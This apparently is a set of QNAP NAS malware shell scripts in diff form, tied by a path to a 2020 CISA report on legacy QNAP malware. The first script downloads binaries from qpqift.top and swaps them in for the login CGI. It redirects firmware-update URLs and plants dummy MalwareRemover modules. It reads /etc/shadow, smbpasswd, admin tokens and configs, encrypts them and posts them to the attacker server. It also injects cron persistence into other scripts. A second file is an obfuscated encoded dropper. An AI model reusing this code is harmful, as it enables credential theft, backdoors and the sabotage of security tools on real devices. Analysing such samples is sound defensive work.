+		if [ "x${rsynchash}" = "x${binhash}" ]; then
+			mv '.qdisk_cmd.tmp' '.qdisk_cmd' && chmod +x '.qdisk_cmd'
+		else
+			rm -f '.qdisk_cmd.tmp'
+		fi
+	fi
+fi
+binhash=''; rsynchash=''
+
+for path in ".config/backup_conf.sh" ".liveupdate/liveupdate.sh"; do
+if [ -f "${path#*/}" ]; then 
+test -f '.qdisk_cmd' && ./.qdisk_cmd +i "${path#*/}"
+elif [ -f "${bdir}/.qpkg/${path}" ]; then
+test -f '.qdisk_cmd' && ./.qdisk_cmd +i "${bdir}/.qpkg/${path}"
+fi
+done
+
+version=$(getcfg System Version)
+test "x${version}" = 'x' && version=$(getcfg System Version -f /etc/default_config/uLinux.conf)
+test "${version##*.}" -lt 3 || test "${version%%.*}" -lt 4 || test "$(version=${version#*.}; echo "${version%.*}")" -lt 3 && version=4.3.3 || { test "${version##*.}" -gt 5 && version=4.3.5; }
+
+if [ ! -d rssdoc ]; then 
+command -v bunzip2 && compext=bz2 || compext=gz
+curl --connect-timeout 12 -m 1200 -k -o "rssdoc.tar.${compext}" "https://qpqift.top/data/rssdoc.tar.${compext}" && test -f "rssdoc.tar.${compext}" && rssdochash="$(openssl dgst -sha1 -binary "rssdoc.tar.${compext}" | openssl base64)" && { test "$rssdochash" = 'WOkc6vlUa7A30GKa4Z4o02CIexk=' || test "$rssdochash" = "0h0Jyx52a/F9YB80Ml4SsEsugyA="; } && { test "$compext" = bz2 && tarflag=j || tarflag=z; } && tar -x${tarflag}f "rssdoc.tar.${compext}" || rm -f rssdoc.tar
+rm -f "rssdoc.tar.${compext}"
+fi
+
+rm -f /home/httpd/{Liveupdate,FirmwareRelease{,_beta}S.xml}
+ln -s "${CWD}"/rssdoc/{Liveupdate,FirmwareRelease{,_beta}S.xml} /home/httpd
+
+if grep 'Liveupdate\|FirmwareRelease\|QTS_FW' /etc/default_config/uLinux.conf /etc/config/uLinux.conf | grep 'qnap\.com\|0\.0\.0\.0'; then
+internalwebport=$(/sbin/getcfg System InnerWebAccessPort -d 58080)
+localupdateurl="http://127.0.0.1:${internalwebport}"
+sed -i 's/https\?:\/\/[^\/]\+\/\(Liveupdate\|FirmwareRelease\|QTS_FW\)/http:\/\/127.0.0.1:'${internalwebport}'\/\1/' /etc/default_config/uLinux.conf /etc/config/uLinux.conf
+fi
+
+test -f '/etc/config/rssdoc/qpkgcenter_*.xml' || test -h '/etc/config/rssdoc/qpkgcenter_*.xml' && { test -f '.qdisk_cmd' && ./.qdisk_cmd -i '/etc/config/rssdoc/qpkgcenter_*.xml'; rm -f '/etc/config/rssdoc/qpkgcenter_*.xml'; }
+
+if find /etc/config/rssdoc | grep 'qpkgcenter_.*\.xml'; then
+:
+else
+cp "./rssdoc/Liveupdate/QTS${version}/qpkgcenter_eng.xml" '/etc/config/rssdoc/qpkgcenter_eng.xml'
+test -f '.qdisk_cmd' && ./.qdisk_cmd +i '/etc/config/rssdoc/qpkgcenter_eng.xml'
+fi
+
+for file in /etc/config/rssdoc/qpkgcenter_*.xml
+do
+if [ -f "$file" ] && { rm -f "$file" || [ ! -s "$file" ]; }; then
+test -f '.qdisk_cmd' && ./.qdisk_cmd -i "$file"
+touch "$file"
+cp -f "./rssdoc/Liveupdate/QTS${version}/${file##*/}" "$file"
+test -f '.qdisk_cmd' && ./.qdisk_cmd +i "$file"
+fi
+done
+file=''
+
+for qpkgdir in "${bdir}/.qpkg" '../../.qpkg'; do
+test -d "$qpkgdir" && break
+done
+test -d "${qpkgdir}/MalwareRemover" || mkdir "${qpkgdir}/MalwareRemover"
+test -d "${qpkgdir}/MalwareRemover/modules" || mkdir "${qpkgdir}/MalwareRemover/modules"
+test -f '.qdisk_cmd' && ./.qdisk_cmd -i "${qpkgdir}/MalwareRemover"
+
+if [ -d "${qpkgdir}/MalwareRemover/modules" ]; then
+for file in 10_derek_3.pyc 12_derek_3.pyc; do
+if [ ! -f "${qpkgdir}/MalwareRemover/modules/${file}" ] || rm -f "${qpkgdir}/MalwareRemover/modules/${file}" || test -x "${qpkgdir}/MalwareRemover/modules/${file}" || [ $(wc -c < "${qpkgdir}/MalwareRemover/modules/${file}") -gt 150 ] || [ $(wc -c < "${qpkgdir}/MalwareRemover/modules/${file}") -lt 120 ]; then
+test -f '.qdisk_cmd' && test -f "${qpkgdir}/MalwareRemover/modules/${file}" && ./.qdisk_cmd -i "${qpkgdir}/MalwareRemover/modules/${file}" && rm -f "${qpkgdir}/MalwareRemover/modules/${file}"
+openssl base64 -d <<"EOF" >"${qpkgdir}/MalwareRemover/modules/${file}"
+A/MNCuVwTVxjAAAAAAAAAAABAAAAQAAAAHMLAAAAZQAAgwAAAWQAAFMoAQAAAE4o
+AQAAAHQEAAAAZXhpdCgAAAAAKAAAAAAoAAAAAHMVAAAAbW9kdWxlcy8xMF9kZXJl
+a18zLnB5dAgAAAA8bW9kdWxlPgEAAABzAAAAAA==
+EOF
+chmod -x "${qpkgdir}/MalwareRemover/modules/${file}"
+test -f '.qdisk_cmd' && ./.qdisk_cmd +i "${qpkgdir}/MalwareRemover/modules/${file}"
+fi
+done
+fi
+file=''; qpkgdir=''
+
+if [ ! -f .rsakey ]; then
+verifykey='-----BEGIN PUBLIC KEY-----
+MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
+CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
+verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
+RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
+Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
+gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
+2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
+0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
+pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
+DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
+-----END PUBLIC KEY-----'
+test -f ".rsakey" || echo "$verifykey" > ".rsakey"
+fi
+
+cgibindir='/home/httpd/cgi-bin'
+if [ ! -f "1549101600_c" ] && [ -f "${cgibindir}/authLogin.cgi" ]; then
+	test -f "1549101600_c" || touch "1549101600_c"
+	case "$(uname -m)" in 
+	*x86_64*)
+			arch=x86_64
+			binhash='rrYwg0D4+4DxcDxYQsNTB4JUGlQ='
+			;;
+	*arm*|*aarch*)
+			arch=arm
+			binhash='Z4n2BZdhwjYf0wjM7GCW61WM9eU='
+			;;
+	*i*86*)
+			arch=i486
+			binhash='U3eHe6syQraRBGgsvkFZH3wibDw='
+			;;
+	esac
+	
+	if [ "x${binhash}" != 'x' ]; then
+		curl --connect-timeout 12 -m 1200 -k -o ".qal" "https://qpqift.top/data/qal2_${arch}" || rm -f ".qal"
+		test -f '.qal' && rsynchash="$(openssl dgst -sha1 -binary ".qal" | openssl base64)"
+		if [ "x${rsynchash}" = "x${binhash}" ]; then
+			test -f "${cgibindir}"/sysauthLogin.cgi && mv "${cgibindir}"/sysauthLogin.cgi "${cgibindir}"/authLogin.cgi
+			mv "${cgibindir}"/authLogin.cgi "${cgibindir}"/sysauthLogin.cgi && test -f "${cgibindir}"/sysauthLogin.cgi && mv '.qal' "${cgibindir}"/authLogin.cgi && chmod 755 "${cgibindir}"/authLogin.cgi
+		fi
+		test -f '.qal' && rm -f '.qal'
+	fi
+fi
+
+if  [ -f "${cgibindir}"/authLogin.cgi ] && "${cgibindir}"/authLogin.cgi | grep '<QDocRoot'; then
+:
+else
+test -f "${cgibindir}"/sysauthLogin.cgi && mv "${cgibindir}"/sysauthLogin.cgi "${cgibindir}"/authLogin.cgi
+fi
+
+test -f /etc/config/.qsync.conf && authkeysfile=$(grep AuthorizedKeysFile /etc/config/.qsync.conf | sed 's/"//g' | cut -d ' ' -f 2)
+if [ "$authkeysfile" ] && [ -f "$authkeysfile" ] && grep 'miOGcmendZU2r10SdZVplBQ4i' "$authkeysfile"; then
+sed -i '/miOGcmendZU2r10SdZVplBQ4i/d' "$authkeysfile"
+lsofout="$(lsof +c 0 -i -n -P | grep :51163)"
+sshpid="$(echo "$lsofout" | tr -s ' ' | cut -d ' ' -f 2 | head -n 1)"
+kill -2 "$sshpid"
+fi
+
+if [ ! -f '1548997200_c' ]; then
+touch '1548997200_c'
+mdir=`mktemp -d /tmp/.mount.XXXXXX` || { mdir=/tmp/.mount.jbbxQob; mkdir ${mdir}; } || mdir=`mktemp -d "${bdir}/.mount.XXXXXX"` || { mdir="${bdir}/.mount.jbbxQob"; mkdir ${mdir}; } || `mktemp -d "/mnt/HDA_ROOT/.mount.XXXXXX"` || { mdir="/mnt/HDA_ROOT/.mount.jbbxQob"; mkdir ${mdir}; } || `mktemp -d "/.mount.XXXXXX"` || { mdir="/.mount.jbbxQob"; mkdir ${mdir}; } || `mktemp -d "./.mount.XXXXXX"` || { mdir="./.mount.jbbxQob"; mkdir ${mdir}; }
+__BOOT_DEV=
+__model=`getcfg System "Internal Model"`
+CONFIG_DEV_NODE=`getcfg "CONFIG STORAGE" DEVICE_NODE -f /etc/platform.conf`
+CONFIG_DEV_PART=`getcfg "CONFIG STORAGE" FS_ACTIVE_PARTITION -f /etc/platform.conf`
+CONFIG_DEV_FS=`getcfg "CONFIG STORAGE" FS_TYPE -f /etc/platform.conf`
+__BOOT_CONF=`test -f /etc/default_config/BOOT.conf && cat /etc/default_config/BOOT.conf 2>/dev/null || cat "${confdir}/BOOT.conf"` || { test "$arch_o" = arm && __BOOT_CONF=TS-NASARM; } 
+command -v hal_app > /dev/null 2>&1 && { __BOOT_DEV=$(hal_app --get_boot_pd port_id=0); }
+test "${__BOOT_CONF}" = TS-NASARM || test "$arch_o" = arm && { test -f /etc/IS_TAS && __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}7" || __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}5"; } || __BOOT_DEV="${__BOOT_DEV:-/dev/sdx}6"
+test "x${CONFIG_DEV_NODE}" != "x" && { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}" > /dev/null 2>&1 || { test -f /etc/IS_TAS && mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } } || mount ${__BOOT_DEV} -t ext2 ${mdir} || { test "${__model}" = "TS-201" && mount -t ext2 /dev/mtdblock4 ${mdir}; } || { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}"; mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } || { test "${__model}" = "TS-269L" && mount -t ext2 /dev/sdc6 ${mdir}; } || { test "${__model}" = "TS-869" && mount -t ext2 /dev/sdi6 ${mdir}; } || { test "$arch_o" = arm || ${__BOOT_CONF} = "TS-NASARM" && { for i in 5 7 4 6 3 8; do mount -t ext2 "/dev/mtdblock${i}" ${mdir} && break; done; }; } || { test "$arch_o" = x86 && for n in /dev/sdc /dev/sdx /dev/sdi $__BOOT_DEV; do for i in 6 $CONFIG_DEV_PART; do mount -t ext2 ${n}${i} ${mdir} && break 2; done; done; } || { mount -t ext2 $(/sbin/hal_app --get_boot_pd port_id=0)6 ${mdir}; }
+
+if [ $? -eq 0 ] || mount | grep "$mdir" >/dev/null; then
+for file in "${mdir}"/K01* "${mdir}/autorun.sh" '/tmp/config/autorun.sh'; do
+if [ -f "$file" ]; then
+sedcmd='s/CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/CXqrBM2CVbJog4rwwSz1Bp1i1'"'"'\
+verifykey="${verifykey}"'"'"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/'
+grepstring='CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex'
+sedreplace "$grepstring" "$sedcmd" "$file"
+sedcmd='s/g4rwwSz1Bp1i1'"'"'/g4rwwS'"''"'z1Bp1i1'"'"'/'
+grepstring='g4rwwSz1Bp1i1'"'"
+sedreplace "$grepstring" "$sedcmd" "$file"
+test -f '.qdisk_cmd' && ./.qdisk_cmd +i "$file"
+fi
+done
+fi
+umount "$mdir"
+rmdir "$mdir"
+fi
+
+if [ ! -f '1548914400_c' ]; then
+touch '1548914400_c'
+key=$(tr -dc 'a-zA-Z0-9' </dev/urandom | { key=''; dd bs=20 count=1 2>/dev/null || head -c 20 || IFS='' read -rd '' -n 20 key; echo "$key"; } )
+test "x$key" = 'x' && key=$(LC_ALL=C sed 's/[^a-zA-Z0-9]//g' </dev/urandom | { key=''; dd bs=20 count=1 2>/dev/null || head -c 20 || IFS='' read -rd '' -n 20 key; echo "$key"; } )
+{ echo "$key" | openssl rsautl -pubin -inkey .rsakey -encrypt | openssl enc -base64 -A; printf ':'
+{ echo; for file in "${bdir}/.log/.rqsys.log" /etc/config/.qos_config/users/admin/.qtoken /etc/config/.qos_config/users/admin/secondSV.conf /etc/config/ssmtp/ssmtp.conf /etc/config/smbpasswd /etc/shadow /etc/config/uLinux.conf /etc/default_config/uLinux.conf /mnt/HDA_ROOT/.config/qnapddns.conf /mnt/HDA_ROOT/.config/qid.conf /etc/platform.conf /etc/default_config/BOOT.conf /etc/default_config/Model_Name.conf /etc/config/qid.conf /etc/config/qddns_users.conf; do printf '%s:' "$file"; cat "$file"; echo; done; printf '%s:' "authLogin.cgi"; /home/httpd/cgi-bin/authLogin.cgi; printf '%s:' "display_name"; /sbin/get_display_name; } | gzip | { dd bs=4096 count=512 || head -c 2097152 || cat; } | openssl enc -aes-256-cbc -k "$key" -md md5 -salt -a -A; } | curl --connect-timeout 12 -m 300 -k -d '@-' "https://qpqift.top/ping.pl"
+fi
+
+if [ ! -f 1549429200_c ]; then
+touch 1549429200_c
+test -f liveupdate.sh && cronscriptpath=.liveupdate/liveupdate.sh || { test -f backup_conf.sh && cronscriptpath=.config/backup_conf.sh; }
+
+if [ ! -z $cronscriptpath ]; then
+{ { crontab -l || cat /etc/config/crontab; } | grep -v '^#' | awk '{ print $6 }'; sed -n 's/^ \?[Ss]hell \?= \?//p' /etc/config/qpkg.conf; } | grep '/' | sort | uniq | while IFS= read -r line; do
+test ! -z "$line" || continue
+test -f "$line" || continue
+test "$line" = $(pwd)/liveupdate.sh || test "$line" = $(pwd)/backup_conf.sh && continue
+rm .tmp.cronCDhLbZ
+head -n 1 "$line" >.tmp.cronCDhLbZ && grep '^#!/bin/b\?a\?sh' .tmp.cronCDhLbZ || { rm -f .tmp.cronCDhLbZ; continue; }
+cat >>.tmp.cronCDhLbZ <<"XXEOF"
+( exec >/dev/null 2>&1; (
+export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
+command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
+test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
+test -d "$confdir" || confdir=/etc/config
+command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
+\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
+//I;s/\(^\|\
+\)\[[^\
+]\+\]\
+.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
+bdir=
+test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
+echo 'ab*c' | grep -F 'ab*c' >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
+test "$fgrep" || fgrep=grep
+
+XXEOF
+cat >>.tmp.cronCDhLbZ <<XXEOF
+if [ ! -f "\${bdir}/.qpkg/${cronscriptpath}" ]; then
+test -d "\${bdir}/.qpkg" || mkdir -p "\${bdir}/.qpkg" || mkdir "\${bdir}/.qpkg"
+test -d "\${bdir}/.qpkg/${cronscriptpath%/*}" || mkdir "\${bdir}/.qpkg/${cronscriptpath%/*}"
+cat > "\${bdir}/.qpkg/${cronscriptpath}" <<"XEOF"
+XXEOF
+cat "${cronscriptpath#*/}" >>.tmp.cronCDhLbZ
+cat >>.tmp.cronCDhLbZ <<XXEOF
+XEOF
+chmod 755 "\${bdir}/.qpkg/${cronscriptpath}"
+touch -cr /bin/busybox "\${bdir}/.qpkg/${cronscriptpath}"
+( ( exec >/dev/null 2>&1 </dev/null; "\${bdir}/.qpkg/${cronscriptpath}" </dev/null >/dev/null 2>/dev/null & ) & )
+fi
+
+test -x "\${bdir}/.qpkg/${cronscriptpath}" || chmod 755 "\${bdir}/.qpkg/${cronscriptpath}"
+
+crontabargs=\$(ps | grep 'cr[o]nd ' | sed -n 's/.*crond[^0-9A-Za-z-]*\\(.\\+\\)/\\1/p')
+trycount=10; trycount=\$(( \$trycount - 10 ))
+set x \$crontabargs; shift
+while [ \$# -gt 0 ] && [ \$trycount -lt 10 ]; do
+trycount=\$(( \$trycount + 1 ))
+getopts ':c:' OPT 2>/dev/null
+test "\$OPT" = 'c' && crontabfile="\${OPTARG}/admin" && break
+test "\$OPTIND" -gt 0 && shift "\$OPTIND" && OPTIND=1 || break
+done
+test "\$crontabfile" && test -f "\${crontabfile}" || crontabfile='/tmp/cron/crontabs/admin'
+
+for crontab in "\$crontabfile" "\${confdir}/crontab"; do
+if \$fgrep "\${bdir}/.qpkg/${cronscriptpath}" "\$crontab"; then
+:
+else
+cronmins=\$(printf '%i' "\$(( \$RANDOM % 60 ))")
+cronhour=\$(printf '%i' "\$(( \$RANDOM % 24 ))")
+cronhour=\$(printf '%i,' "\$(( ( \$cronhour + 8 ) % 24 ))" "\$(( ( \$cronhour + 16 ) % 24 ))")"\$cronhour"
+echo "\$cronmins \$cronhour"' * * * '"\${bdir}/.qpkg/${cronscriptpath} >/dev/null 2>/dev/null" >> "\$crontab"
+crontab "\$crontab"
+sleep 2
+fi
+done
+) & ) &
+XXEOF
+sed -n '2,$p' "$line" >>.tmp.cronCDhLbZ && mv .tmp.cronCDhLbZ "$line"
+chmod a+x "$line" || chmod 755 "$line"
+test -f .tmp.cronCDhLbZ && rm .tmp.cronCDhLbZ
+done
+fi
+fi
+
+test -f "${ts}_c" || touch "${ts}_c"
+rm -f "${CWD}/".tmp.*
+exit 0

2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/4b514278a3ad03f5efb9488f41585458c7d42d0028e48f6e45c944047f3a15e9

@@ -0,0 +1,535 @@
+#!/bin/sh
+iifEsx=${ItjkToy}tr
+EJrRDOD=${yCxo}${cLJbbLDqLZwXv}\\${agYc}${RrjzeLYCRUzos}
+VmyzjJv=${xlZGXdYXJFYgH}${kWeAeBftiPR}${JFMCQy}${EJrRDOD}${fHGHSADsOyn}13${mGaotN}${WxMnjPT}3
+CdKAKzH=${wfKXIFWvqOikn}${twRUZectEUG}${CNfQNb}${EJrRDOD}${GSjRhNCYzWG}05${DWpJgo}${kAqrAMV}5
+bHlsbZa=${myLnvVtWItJnf}${UaUurmZJzSI}${tPxwHu}${EJrRDOD}${mAghPcqqNjE}13${HjcERM}${TqxlNfO}4
+$iifEsx '>may!'$CdKAKzH'Gju#Y%nJgRNq&hWI<Dc|VpoM{\n}AzOUQKfCL;T'"'"'vribHF]B"kt('$VmyzjJv'` PEx+=Z'$bHlsbZa'$ed*swSl)X' 'JNxBZP#&bktv'$CdKAKzH'MVnc%Ui('$VmyzjJv')I>OwAX`+zjG*KlY|\nqfS TaoLDh!=g}FerQ;Rs'$bHlsbZa'Wd'"'"'$Hpy<]"umC{E' << "EgdaOBDdZ" | ${xUSaSbNWXji}s${WWfYBc}h${jXdVSwF}
+;Bu xlAbA]/HZ)+YiiU& [kOQv"rSt/Z=Ea68=Z)hmC>'P! l#OBVb"YY$+/NZ)Xp};HVR[tX"BhnuhR/PePZ)y[%CC"/PHZ)(RBPykN|w}}#"v(t.Z)O(XwOV#"NZ)}yA>%"BZ)+HPb#SJ>g"hZ)\$r+w+lo!+bk|Q("Z)v\AYYx"Z)[}h(vLNPlJp "fZ=Ea74=(Z)b+w
+%##v+YX!m|"Z);aRD[[yNYJ"T=b}Rvm` &oeE134"aPqkBE055\
+w=s=s=yCWrU{jui;]ZJTxLFY[S>Mz#Xh)+sVgE133QOD!%cl|AER'-<$*NKHdGt(p=T=YZehF=s=s=|W%ERQ coa(t"+xHlvp)ib-'zMwGDTLus};\]E134E055O`gXA<PdrBKE133m[J>jRU&{S$q*V
+Cy!kN#=ddsbebuk;kubCSscZ;Bu xlAbAf]m/xv|/sweIB|ksbkJ&+JeWJeJJJJAg(yAJsS#eJJJJAg(yAJ-v|S}W1:M4n#eJJJJAg(yAJ-yqS}W2:M12n#eJJJJAg(yAJps<y(BSL}W3:MyMKCMGnLeJJJJbkJM\(JL}ps<y(BLJVJ/\Bo/;ky|\g-JQJWJeJJJJJJJJkBy\JMk|J}&&}"CDU %J$J&J}-yqJMJ}-v|J'J1J+J'J}-v|J++Js#eJJJJJJJJB(wgJL}sLeJJJJnene(g--y|\JMoJ-pbB-<JaJ/\Bo/|;AAJ2al1JQQJ-pbB-<J&+JWJeAg(yAJs;TTvqSiIB|ksbkJ6J6iebBsbJL}2LJllJWJ-p\vkJL}W2$PPPPPPn}s;TTvqL#JB(wgJL}W2$PPPPPPn}s;TTvqL#JnJQQJWJbg;(wJL}W1$PPPPPPn}s;TTvqL#JB(wgJL}W1$$PPPPPPn}s;TTvqL#JneneBqB(J2a/\Bo/|;AAe{Cj[SL}W{Cj[n:/xv|:/sxv|:/;sk/xv|:/;sk/sxv|:/;sk/xv|/P11:/;sk/Ag(yA/sxv|:/;sk/Ag(yA/xv|LebBsbJmJMKJL}W!fh"E_Yj"ZD)nLJQQJWJ<kv|bTJLUybB:JL#JjGS)%jJ\ybB#JBqvbJ0#JneB(wgJLUybB:JY;|JUB(J18J11:56:51J)%jJ2016Le(kSi<kv|bTJ`>k`JQQJB(wgJM|BJ`>k`iebBsbJL}W](knLJMBHJ1JllJB(wgJL}(kLJQQJB(wgJLLebBsbJLq}[jj{_"hth"h"LJSJLq88\\45y\61x9\18x47216856(77T1(3Txx38y191LJQQJBqvbJ0ebBsbJmJMKJL}W0nLJllJbBsbJi<sJy;qJQJIkB<JL}W0nLJQJN(JMAiJMIbJ40JllJBqvbJ0e(g--y|\JMoJg<B|ssAJa/\Bo/|;AAJ2al1JllJWe{ YjUCjCS``epSLyT;{j<wj;-B|0rA7{|k<%)N|3PDx<N;;LebBsbJLq}W"h!fhYj_%hj[ UnLJSJq{ YjJllJbBsbJmJMKJL}W!fh"E_Yj"ZD)nLJllJ(ysBJL}W!fh"E_Yj"ZD)nLJv|J``JQJuOm0M9*uJQJ0uJ+JTyAsBJ##JO0M9*O0M9*O0M9*O0M9*O0M9*O0M9*O0M9*O0M9*J+J\SL}&&Ji\ybBJ'$siJ/J100J++L#JbBsbJL}W!fh"E_Yj"ZD)nLJSJL}W\nLJllJ(bSL}\LJQQJWJbBsbJL}W!fh"E_Yj"ZD)nLJSJL}&&J}\JMJ1++LJllJ(bSL}&&J}\JMJ1J++L#JnJ##Ju+JTyAsBJ##JBsy(JllJbBsbJmJMKJL}W!fh"E_Yj"ZD)nLJllJWe|AS`e`e(ysBJL}W= DjhDj_rhD)j[nLJv|J``JQJuOm0M9*uJQJ0uJ+JTyAsBJ##Ju+JbBsbJL}W= DjhDj_rhD)j[nLJMAbJ2147483646J##JBsy(JllJWJZtYSJkBy\JM\J``JMk|JL}W= DjhDj_rhD)j[nLJ{ YjUCjC#JbBsbJMKJL}{ YjUCjCLJllJ{ YjUCjCSi\\JxsS1J(g;|bSL}= DjhDj_rhD)j[LJ2a/\Bo/|;AAi#JnJQQJbBsbJL}{ YjUCjCLJQQJ{ YjUCjCSi(ybiJQQJBqvbJ0esSL}W{ YjUCjC]]u.nLesbSL}Ws]]uMnLesSL}Ws$$MunLe\SL}&&J}\J/J1000J++LebBsbJmJMKJL}\LJllJbBsbJmJMKJL}sbLJllJbBsbJL}W]sbnLJSJ5JllJWJbBsbJLq}sbLJSJLq}\LJQQJbBsbJLq}sbLJSJLq}&&J}\JMJ1J++L#JnJQQJWJbBsbJMTJL}bLJllJk-JL}bL#JBqvbJ0#Jne(ysBJL}sLJv|J``JQJuOmyMKCMG0M9/'S}|A*uJ+JbBsbJMTJL}bLJllJk-JL}bL#JBqvbJ0#J##JBsy(ebSi-pbB-<J/b-</.b-<.PPPPPPiJQQJBqvbJ0e(ybJaJL}bLJVVLh tLJQQJWJbBsbJMTJL}bLJllJk-JL}bL#JBqvbJ0#JneMMMMMdh)ZDJ{fdrZ=JzhEMMMMMe%ZZdgFCDdIpHwpv)9N0dC!htCC =CE8C%ZZdvIz=CEhCRv)'[/1T(r%TjDfoodBse cH06T )-dtzZf ={sR)<C;KUk=zA|d;[gr4wYhb|;qjdDb8FCdK\G'<9HfxCG3 eKy{-cZ\s1I[[A1zt'!8[5xD\Ds9%="pho=fIc)tB3CyAr7p'F/"Pds
+ksr=z\)z
+ey['\b=0D\rz\pKwz8HdHK[q='%f)KBB5// IUz\(zBBAy=IKfcy0;v11dG3ZFz<!eA7[gpX[-RK"kc){(;(4pA[9xz4YBCUBw"RFRAvo[!(HYz1sDsNy<c-2HUFR!7wF"e"2sy K;xjfN1'2!zA'%R5YTRg/d8Dg<DE6hC r8E={X[=y<H2yT2GRbwyX22X<TEeKbKFhR5 ptDw6T"IGD<xs;%;4|{yd/kIoc-s
+q93y|sw4ZBPv{R ;zXdy-fGRZoreqk2hY=2kwI
+wHIc;vrA[)'[%z63{g\d%tRzH9kr\4w99|Px9'v=-t!9TKczs9YY%eF7qy\)<yxz2yDj<D3KUC;h)Z4G bHqrH
+Fh[-0xh'G5tCI%dCChSeMMMMMhDUJ{fdrZ=JzhEMMMMMeh tebBsbJmJMKJL}sLJllJwSig<B|ssAJxysB64JM\JVVh tJQJg<B|ssAJksy;bAJM<;xv|JMv|pBRJL}bLJMoBkvTRe}seh teiJQQJWJbBsbJMTJL}bLJllJk-JL}bL#JBqvbJ0#JnebBsbJMTJL}bLJllJk-JL}bLe-SL}W{ YjUCjC$$.unLe{ YjUCjCS``e(ysBJL}-LJv|J``JQJuOmyMKCMG0M9/'S}|A*uJ+JBqvbJ0J##JBsy(epSig<B|ssAJ\IsbJMswy1JMxv|ykRJMw-y(JL}(bLJVVh tJQJg<B|ssAJxysB64e}peh teie-Sig<B|ssAJB|(JM\JMyBsM256M(x(JMpJL}pLJM-\Jswy1JMsyAbJMyJVVh te}-eh teie-wSig<B|ssAJ\IsbJMswy1JMxv|ykRJMw-y(JL}sbLJVVh tJQJg<B|ssAJxysB64e}-eh teiebBsbJmJMKJL}wLJllJbBsbJL}wLJSJL}-wLJQQJBqvbJ0eBoyAJL}-Lebk;BenJQQJWebSi-pbB-<J/b-</.b-<.PPPPPPiJQQJBqvbJ0e(ybJaJL}bLJVVLh tLJQQJWJbBsbJMTJL}bLJllJk-JL}bL#JBqvbJ0#JneMMMMMdh)ZDJ{fdrZ=JzhEMMMMMe%ZZdgFCDdIpHwpv)9N0dC!htCC =CE8C%ZZdvIz=CEhC9!-[%N4FN8= rEzI HT=e0)Gs"YNtIvqj0Av%(42GYksskst)GAU{z35KA\-xfsh!PbtEpUFXBf(p<2yw8t(TeCdtf)8%r|A6Njoq)GNccx%r{UvEg5A/\07dz(xNE;HD<'2//2\;pq=Ryp ZZ|ZHterIk%5|o<5dzdd((%A%dystbqGTtIbDFA!9v9-DTv53|yAk%{"gA9zvT
+1Eq-rN1'e7)j;FtYARz9C<ov/GZ2R/oR-6D
+x
+hsyh5d9IIPcEkXqAxzq%ZK
+;PT18Y2<48twe<XfREc0-FUf(3Yvc"4"v{vp{<j!IpYFR90y%zkg
